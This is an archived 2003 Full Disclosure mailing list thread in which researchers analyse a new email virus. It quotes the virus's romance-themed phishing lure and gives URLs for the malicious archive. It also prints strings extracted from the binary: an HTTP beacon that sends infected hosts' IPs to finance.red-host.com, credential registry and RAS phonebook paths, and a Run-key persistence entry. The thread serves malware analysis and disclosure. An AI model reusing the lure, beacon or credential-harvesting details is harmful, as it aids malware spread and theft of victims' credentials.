Full Disclosure mailing list archives
Re: New virus
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Tue, 25 Nov 2003 14:44:33 +0100
Hi, Look this line: GET /events.php?%s HTTP/1.1 Accept: */* Connection: Keep-Alive Host: finance.red-host.com id=%s&ip=%s&speed=%d&timeonline=%d finance.red-host.com so imagine this: id=[autonumeric ]&ip=[internet address by gestaddrbyhost]&speed=[connection speed]&timeonline=[seconds/minutes] this logs the information about an infected host. look more: /* Written By Adrey Karimov [www.proantivirus.com] */ This can be a bogus data but , that boy is from an antivirus related company ! :) ( who are the virii authors now ? ) %s0x%02hx%02hx%02hx%02hx%02hx%02hx S-%lu- %s SC:%s %s SW:%i.%i.%i.%i %s PW:%i.%i.%i.%i %s SD:%i.%i.%i.%i %s PD:%i.%i.%i.%i %s IP:%i.%i.%i.%i %s%s:%s:%s [%s] DialParamsUID %sMicrosoft\Network\Connections\pbk\rasphone.pbk %s\ LdapUnicodeToUTF8 Thsi calls the api of microsoft ras and insert the data into a new telefonic connection. This functions are called , so the virus uses the memeroy stack: strcat strchr <-* strcmp strlen strncat strncpy <- * strstr < - * And it creates a file with the first data : c:\temp35.txt It keeps there the data found at SOFTWARE\Microsoft\Internet Account Manager\Accounts Other things that the virus do: Software\Microsoft\Windows\CurrentVersion\Run \sysdeb32.exe 31337 c:\tmp.exe Creates a regkey to run it at startup and it copies to some locations. stores this data ?¿? : %-2.2X %.8x%.8x \svc.sav I thin k some info is hardcoded . The presence of sysdeb32.exe and tmp.exe indicates virus activity. i don't know which virus is this. xD Best regards , ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->\x74\x72\x75\x6c\x75\x78 0x02->The truth is out there, 0x03-> outside your mind . __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** \x6e\x73\x72\x67 \x73\x65\x63\x75\x72\x69\x74\x79 \x72\x65\x73\x65\x61\x72\x63\x68 http://www.nsrg-security.com ______________________ ----- Original Message ----- From: "Andrew Thomas" <andrewt () nmh co za> To: "'Full Disclosure'" <full-disclosure () lists netsys com> Sent: Tuesday, November 25, 2003 9:02 AM Subject: [Full-disclosure] New virus
Hi, Just to confirm receipt of another email containing the following text: --snip-- Hello my dear Mary, I have been thinking about you all night. I would like to apologize for the other night when we made beautiful love and did not use condoms. I know this was a mistake and I beg you to forgive me. I miss you more than anything, please call me Mary, I need you. Do you remember when we were having wild sex in my house? I remember it all like it was only yesterday. You said that the pictures would not come out good, but you were very wrong, they are great. I didn't want to show you the pictures at first, but now I think it's time for you to see them. Please look in the attachment and you will see what I mean. I love you with all my heart, James. --snip-- With attached Private.zip. A quick strings (after unpacking) on the file gives http://afx.alink.co.za/rt.txt The original archive is available @ http://afx.alink.co.za/Private.zip I don't have the time to take this apart, but some interesting things include a call to function "UrlDownloadToFileA", and a bunch of other HTTP-style requests. Also looks like it may do some kind of speed test and post results as well remotely, including IP address of the infected host, as well as pulling stuff out like RAS info, pop3 info, etc. The host that appears to be called is "finance.red-host.com", with a call made to the page "showinfo.php", which returns only --snip-- Error 0x7a2e: Invalid query, database search failed. --snip-- without anything appended. There's quite a bit more in here. A. -- Andrew G. Thomas Hobbs & Associates Chartered Accountants (SA) (o) +27-(0)21-683-0500 (f) +27-(0)21-683-0577 (m) +27-(0)83-318-4070 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- New virus Andrew Thomas (Nov 25)
- Re: New virus Alain Fauconnet (Nov 25)
- <Possible follow-ups>
- New virus Andrew Thomas (Nov 25)
- Re: New virus Lorenzo Hernandez Garcia-Hierro (Nov 25)
- Re: New virus Steven Harrison (Nov 25)
- Re: New virus Joe Stewart (Nov 26)
- Re: New virus Lorenzo Hernandez Garcia-Hierro (Nov 25)
- RE: New virus Kristian Hermansen (Nov 25)